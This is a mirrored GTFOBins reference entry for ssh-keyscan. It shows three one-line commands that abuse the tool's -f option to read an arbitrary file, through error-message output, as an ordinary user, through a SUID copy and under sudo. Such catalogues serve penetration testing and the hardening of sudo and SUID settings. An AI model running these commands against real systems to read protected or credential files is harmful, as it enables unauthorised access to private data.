1
0
Fork 0
mirror of https://github.com/GTFOBins/GTFOBins.github.io.git synced 2024-05-24 16:26:01 +02:00
GTFOBins.github.io/_gtfobins/ssh-keyscan.md
2020-12-20 20:44:24 +01:00

392 B

description functions
The file content is actually parsed so only a part of each line is returned as a part of an error message.
file-read suid sudo
code
LFILE=file_to_read ssh-keyscan -f $LFILE
code
LFILE=file_to_read ./ssh-keyscan -f $LFILE
code
LFILE=file_to_read sudo ssh-keyscan -f $LFILE